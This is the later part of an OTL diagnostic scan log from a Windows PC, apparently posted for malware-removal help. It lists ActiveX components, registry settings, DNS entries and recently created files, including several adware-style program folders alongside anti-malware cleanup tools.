O16 - DPF: {4CE60FE0-C7F9-4B9C-99AD-A9CF89A125E4} https://siebweb.intergraph.com/service_enu/23030/applets/SiebelAx_OutBound_mail.cab (Siebel Email Support for Microsoft Outlook and Lotus Notes)
O16 - DPF: {88B13ADE-6D08-4744-B54A-465C433D0E45} https://siebweb.intergraph.com/service_enu/23030/applets/SiebelAx_HI_Client.cab (Siebel High Interactivity Framework)
O16 - DPF: {8C244272-1DC1-4CE7-9C6C-FABCA09EB543} https://siebweb.intergraph.com/service_enu/23030/applets/SiebelAx_Desktop_Integration.cab (Siebel Desktop Integration)
O16 - DPF: {B3FC07ED-8649-47A7-9F0B-F1DE12B64CCE} https://siebweb.intergraph.com/service_enu/23021/applets/SiebelAx_HI_Client.cab (Siebel High Interactivity Framework)
O16 - DPF: {CECC827D-2E73-4786-B5AF-EF4FE1CAADED} https://siebweb.intergraph.com/service_enu/23030/applets/SiebelAx_OutBound_mail.cab (Siebel Email Support for Microsoft Outlook and Lotus Notes)
O16 - DPF: {D5D66C38-36BF-4C81-8665-4B6250CECA0B} https://siebweb.intergraph.com/service_enu/23021/applets/SiebelAx_OutBound_mail.cab (Siebel Email Support for Microsoft Outlook and Lotus Notes)
O16 - DPF: {E06E2E99-0AA1-11D4-ABA6-0060082AA75C}  (Reg Error: Value error.)
O16 - DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://juniper.net/dana-cached/sc/JuniperSetupClient.cab (JuniperSetupClientControl Class)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 148.53.81.2 148.53.130.1 148.53.46.62
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = ingrnet.com
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C428C679-148E-45A9-B58D-4C85283F4BE2}: DhcpNameServer = 148.53.81.2 148.53.130.1 148.53.46.62
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{E44A86FF-E81C-48AD-8DA7-30983FEA8539}: DhcpNameServer = 172.20.10.1
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2014-05-29 08:52:05 | 000,000,000 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]
 
[2014-12-23 12:24:04 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\dkoloszc\Desktop\OTL.exe
[2014-12-23 12:21:03 | 000,000,000 | ---D | C] -- C:\FRST
[2014-12-23 12:20:27 | 002,122,240 | ---- | C] (Farbar) -- C:\Users\dkoloszc\Desktop\FRST64.exe
[2014-12-23 10:35:50 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Roaming\eCyber
[2014-12-23 10:06:02 | 000,000,000 | ---D | C] -- C:\ProgramData\Emsisoft
[2014-12-23 09:34:38 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emsisoft Anti-Malware
[2014-12-23 09:34:08 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Emsisoft Anti-Malware
[2014-12-22 09:00:11 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Smart Coupon
[2014-12-22 08:59:54 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\YeoutubeAdBlocke
[2014-12-22 08:59:29 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\BuyuNssaeve
[2014-12-22 08:59:09 | 000,000,000 | ---D | C] -- C:\ProgramData\honnbmlkkhbafkhachmeccikobmajggh
[2014-12-19 08:46:54 | 000,047,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieetwproxystub.dll
[2014-12-19 08:46:53 | 000,076,288 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2014-12-19 08:46:53 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
[2014-12-19 08:46:53 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iernonce.dll
[2014-12-19 08:46:52 | 002,052,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl
[2014-12-19 08:46:52 | 000,710,144 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dll
[2014-12-19 08:46:52 | 000,620,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript9diag.dll
[2014-12-19 08:46:52 | 000,478,208 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieui.dll
[2014-12-19 08:46:52 | 000,115,712 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieUnatt.exe
[2014-12-19 08:46:52 | 000,062,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iesetup.dll
[2014-12-19 08:46:50 | 001,155,072 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmlmedia.dll
[2014-12-19 08:46:50 | 000,168,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msrating.dll
[2014-12-19 08:46:50 | 000,064,000 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MshtmlDac.dll
[2014-12-16 08:31:36 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Local\gtk-2.0
[2014-12-16 08:31:34 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\.thumbnails
[2014-12-16 08:29:23 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Local\fontconfig
[2014-12-16 08:29:21 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Local\gegl-0.2
[2014-12-16 08:29:21 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\.gimp-2.8
[2014-12-09 08:07:13 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\Documents\Axure
[2014-12-09 08:06:59 | 000,000,000 | -H-D | C] -- C:\ProgramData\{5A486131-A1E7-499A-8212-A3213DF05557}
[2014-12-09 08:06:49 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Axure
[2014-12-09 08:06:49 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Axure
[2014-12-08 09:23:04 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Local\Macromedia
[2014-12-05 12:09:55 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\Desktop\Offline Vector Cache
[2014-12-02 09:39:50 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Invisibility Ltd
[2014-12-02 09:39:22 | 000,000,000 | ---D | C] -- C:\MagicPlusMini
[2014-12-02 09:38:02 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RecordableActivator
[2014-12-02 09:37:10 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Roaming\JWrapper-RecordableActivator
[2014-11-26 12:34:16 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Local\Mozilla
[2014-11-26 12:34:09 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Maintenance Service
[2014-11-26 12:34:09 | 000,000,000 | ---D | C] -- C:\ProgramData\Mozilla
[2014-11-26 12:34:08 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2014-11-24 08:33:53 | 000,000,000 | -HSD | C] -- C:\Users\dkoloszc\AppData\Local\EmieBrowserModeList
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]
 
[2014-12-23 12:24:06 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\dkoloszc\Desktop\OTL.exe
[2014-12-23 12:20:32 | 002,122,240 | ---- | M] (Farbar) -- C:\Users\dkoloszc\Desktop\FRST64.exe
[2014-12-23 12:07:40 | 000,010,831 | ---- | M] () -- C:\Windows\cfgall.ini
[2014-12-23 12:05:44 | 000,000,569 | ---- | M] () -- C:\Windows\SMSCFG.ini
[2014-12-23 12:03:38 | 000,001,044 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014-12-23 12:03:20 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014-12-23 12:03:15 | 2073,096,191 | -HS- | M] () -- C:\hiberfil.sys
[2014-12-23 11:52:01 | 000,000,544 | ---- | M] () -- C:\Windows\tasks\G2MUpdateTask-S-1-5-21-29074177-2114273088-3454551869-225919.job
[2014-12-23 11:43:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014-12-23 11:37:00 | 000,001,048 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014-12-23 11:02:28 | 000,000,824 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2014-12-23 09:34:38 | 000,001,097 | ---- | M] () -- C:\Users\Public\Desktop\Emsisoft Anti-Malware.lnk
[2014-12-23 09:20:04 | 002,173,952 | ---- | M] () -- C:\Users\dkoloszc\Desktop\AdwCleaner.exe
[2014-12-22 08:15:43 | 000,008,294 | ---- | M] () -- C:\Users\dkoloszc\AppData\Local\recently-used.xbel
[2014-12-18 10:10:01 | 000,001,298 | ---- | M] () -- C:\Users\dkoloszc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk
[2014-12-16 12:39:28 | 000,334,062 | ---- | M] () -- C:\Users\dkoloszc\SplashScreen.scale-100.xcf
[2014-12-16 12:27:28 | 000,587,981 | ---- | M] () -- C:\Users\dkoloszc\SplashScreen.scale-140.xcf
[2014-12-15 09:48:40 | 000,001,178 | ---- | M] () -- C:\Users\Public\Desktop\paint.net.lnk
[2014-12-15 09:46:02 | 049,336,498 | ---- | M] () -- C:\Users\dkoloszc\Desktop\GTDWS CI with MMW-20141211 1333-1.arf
[2014-12-15 08:38:47 | 000,002,191 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014-12-12 12:41:59 | 000,002,888 | RHS- | M] () -- C:\Users\dkoloszc\ntuser.pol
[2014-12-10 11:43:11 | 000,701,104 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2014-12-10 11:43:11 | 000,071,344 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2014-12-09 08:08:20 | 000,000,032 | -H-- | M] () -- C:\Users\dkoloszc\AppData\Local\t70rc.dat
[2014-12-09 08:06:58 | 000,001,094 | ---- | M] () -- C:\Users\Public\Desktop\Axure RP Pro 7.0.lnk
[2014-12-05 12:54:16 | 000,000,028 | ---- | M] () -- C:\Windows\ODBC.INI
[2014-12-01 14:59:38 | 000,787,106 | ---- | M] () -- C:\Users\dkoloszc\Desktop\GIS Days opis.pdf
[2014-11-27 13:51:41 | 007,446,008 | ---- | M] (深圳创想天空科技有限公司) -- C:\Users\dkoloszc\Desktop\iTools.exe
[2014-11-26 12:34:09 | 000,001,153 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2014-11-25 15:44:22 | 000,026,831 | ---- | M] () -- C:\Users\dkoloszc\Desktop\localisation.xml
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
[color=#E56717]========== Files Created - No Company Name ==========[/color]
 
[2014-12-23 11:02:28 | 000,000,824 | ---- | C] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2014-12-23 09:34:38 | 000,001,097 | ---- | C] () -- C:\Users\Public\Desktop\Emsisoft Anti-Malware.lnk
[2014-12-23 09:19:59 | 002,173,952 | ---- | C] () -- C:\Users\dkoloszc\Desktop\AdwCleaner.exe
[2014-12-22 08:15:43 | 000,008,294 | ---- | C] () -- C:\Users\dkoloszc\AppData\Local\recently-used.xbel
[2014-12-16 12:39:28 | 000,334,062 | ---- | C] () -- C:\Users\dkoloszc\SplashScreen.scale-100.xcf
[2014-12-16 12:27:28 | 000,587,981 | ---- | C] () -- C:\Users\dkoloszc\SplashScreen.scale-140.xcf
[2014-12-16 08:29:02 | 000,000,896 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIMP 2.lnk
[2014-12-15 09:41:08 | 049,336,498 | ---- | C] () -- C:\Users\dkoloszc\Desktop\GTDWS CI with MMW-20141211 1333-1.arf
[2014-12-09 08:06:58 | 000,001,094 | ---- | C] () -- C:\Users\Public\Desktop\Axure RP Pro 7.0.lnk
[2014-12-05 12:54:16 | 000,000,028 | ---- | C] () -- C:\Windows\ODBC.INI
[2014-12-01 14:59:37 | 000,787,106 | ---- | C] () -- C:\Users\dkoloszc\Desktop\GIS Days opis.pdf
[2014-11-26 12:34:09 | 000,001,165 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
[2014-11-26 12:34:09 | 000,001,153 | ---- | C] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2014-11-25 15:44:22 | 000,026,831 | ---- | C] () -- C:\Users\dkoloszc\Desktop\localisation.xml
[2014-05-28 14:57:45 | 000,000,132 | ---- | C] () -- C:\Users\dkoloszc\AppData\Roaming\Adobe PNG Format CC Prefs
[2014-05-07 14:02:17 | 000,001,456 | ---- | C] () -- C:\Users\dkoloszc\AppData\Local\Adobe Save for Web 13.0 Prefs
[2014-03-12 15:29:43 | 000,000,032 | -H-- | C] () -- C:\Users\dkoloszc\AppData\Local\t70rc.dat
[2014-02-24 08:57:02 | 000,002,888 | RHS- | C] () -- C:\Users\dkoloszc\ntuser.pol
[2014-02-21 10:37:34 | 000,143,836 | -H-- | C] () -- C:\Windows\SysWow64\mlfcache.dat
[2014-02-07 09:40:41 | 000,003,584 | ---- | C] () -- C:\Users\dkoloszc\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2014-01-30 16:28:43 | 000,000,000 | ---- | C] () -- C:\Windows\HPMProp.INI
[2014-01-22 13:27:08 | 000,010,831 | ---- | C] () -- C:\Windows\cfgall.ini
[2014-01-22 12:20:28 | 000,000,569 | ---- | C] () -- C:\Windows\SMSCFG.ini
[2014-01-22 11:53:49 | 000,016,724 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014-01-11 13:58:35 | 019,587,072 | ---- | C] () -- C:\Windows\SysWow64\igdfcl32.dll
[2014-01-11 13:58:35 | 000,241,152 | ---- | C] () -- C:\Windows\SysWow64\igdde32.dll
[2014-01-11 13:58:35 | 000,103,936 | ---- | C] () -- C:\Windows\SysWow64\igdail32.dll
[2013-05-12 00:17:52 | 000,001,536 | ---- | C] () -- C:\Windows\SysWow64\IusEventLog.dll
 
[color=#E56717]========== ZeroAccess Check ==========[/color]
 
[2009-07-14 05:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014-03-25 03:43:12 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014-03-25 03:09:54 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009-07-14 02:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010-11-21 04:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009-07-14 02:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
[color=#E56717]========== LOP Check ==========[/color]
 
[2014-05-28 11:25:37 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Amazing
[2014-05-29 10:35:20 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Anvsoft
[2014-03-12 15:29:41 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Axure
[2014-02-25 08:56:11 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Blueberry
[2014-06-02 12:38:18 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\ColorCop
[2014-12-23 10:35:50 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\eCyber
[2014-09-29 14:21:22 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Esri Maps
[2014-11-15 16:05:18 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Juniper Networks
[2014-12-02 09:38:02 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\JWrapper-RecordableActivator
[2014-02-06 15:36:21 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\LogSys
[2014-05-28 15:57:36 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Netscape
[2014-02-25 16:07:29 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Notepad++
[2014-05-07 10:35:57 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\PDAppFlex
[2014-02-04 13:34:08 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Pencil
[2014-05-28 15:56:47 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Photodex
[2014-10-01 14:40:35 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Rsupport
[2014-09-29 12:29:42 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Samsung
[2014-12-05 11:57:12 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Syncios
[2014-02-07 09:37:50 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\TechSmith
[2014-12-15 14:49:36 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Webex
[2014-05-28 15:45:55 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Zoner
 
[color=#E56717]========== Purity Check ==========[/color]
 
 

< End of report >